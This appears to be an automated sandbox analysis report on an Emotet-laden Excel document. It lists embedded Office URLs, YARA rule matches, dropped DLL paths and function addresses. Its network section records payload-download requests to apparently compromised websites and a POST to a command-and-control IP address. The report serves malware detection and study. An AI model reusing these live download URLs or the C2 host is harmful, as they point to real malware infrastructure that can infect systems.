Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601292631425
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://fpastorage.cdn.office.net/%s
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://graph.windows.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://graph.windows.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://invites.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://lifecycle.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://login.windows.local
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://management.azure.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://management.azure.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.action.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.engagement.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ncus.contentsync.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://officeapps.live.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://onedrive.live.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://osi.office.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office365.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office365.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://roaming.edog.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://settings.outlook.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://staging.cortana.ai
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://tasks.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://wus2.contentsync.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: unknown HTTP traffic detected: POST /tkafmhcgcid/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 284Host: 182.162.143.56
Source: unknown DNS traffic detected: queries for: datie-tw.com
Source: global traffic HTTP traffic detected: GET /img/O8G0RDZj7MYCuJyPoP/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: datie-tw.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-bin/WFFcGx/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: copunupo.ac.zmConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /upload/VaOfWEb3pW76UO/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sbm.xinmoshiwang.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/4cChao/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ly.yjlianyi.topConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 175.98.167.165:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 41.63.0.22:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49713 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Office process drops PE file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv2.ooocccxxx Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv3.ooocccxxx Jump to dropped file
Yara signature match
Source: PO0000001552.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Creates files inside the system directory
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\XEzXl\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B07DBCC 8_2_00007FFD2B07DBCC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B07C420 8_2_00007FFD2B07C420
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B06EAB8 8_2_00007FFD2B06EAB8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B06732C 8_2_00007FFD2B06732C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B0719D4 8_2_00007FFD2B0719D4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B07C0E8 8_2_00007FFD2B07C0E8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B07D118 8_2_00007FFD2B07D118
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B06EFA4 8_2_00007FFD2B06EFA4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B07C7C0 8_2_00007FFD2B07C7C0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B06D720 8_2_00007FFD2B06D720
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B074574 8_2_00007FFD2B074574
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B065D68 8_2_00007FFD2B065D68
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B0715B0 8_2_00007FFD2B0715B0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B073CE8 8_2_00007FFD2B073CE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_009B0000 8_2_009B0000
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180001864 8_2_0000000180001864
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008470 8_2_0000000180008470
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800274F4 8_2_00000001800274F4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180012108 8_2_0000000180012108
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180027AE4 8_2_0000000180027AE4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180007F20 8_2_0000000180007F20
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180019F38 8_2_0000000180019F38
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000EB3C 8_2_000000018000EB3C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000FBB4 8_2_000000018000FBB4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180001FE8 8_2_0000000180001FE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800197F8 8_2_00000001800197F8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180012BFC 8_2_0000000180012BFC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001EBFC 8_2_000000018001EBFC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008BFC 8_2_0000000180008BFC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003800 8_2_0000000180003800
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180007014 8_2_0000000180007014
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015020 8_2_0000000180015020
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002A43C 8_2_000000018002A43C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E850 8_2_000000018000E850
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180002C5C 8_2_0000000180002C5C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180013468 8_2_0000000180013468
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A470 8_2_000000018001A470
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180016C70 8_2_0000000180016C70
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180014C80 8_2_0000000180014C80
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000B888 8_2_000000018000B888
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180011C90 8_2_0000000180011C90
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021894 8_2_0000000180021894
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021094 8_2_0000000180021094
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180026098 8_2_0000000180026098
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180005498 8_2_0000000180005498
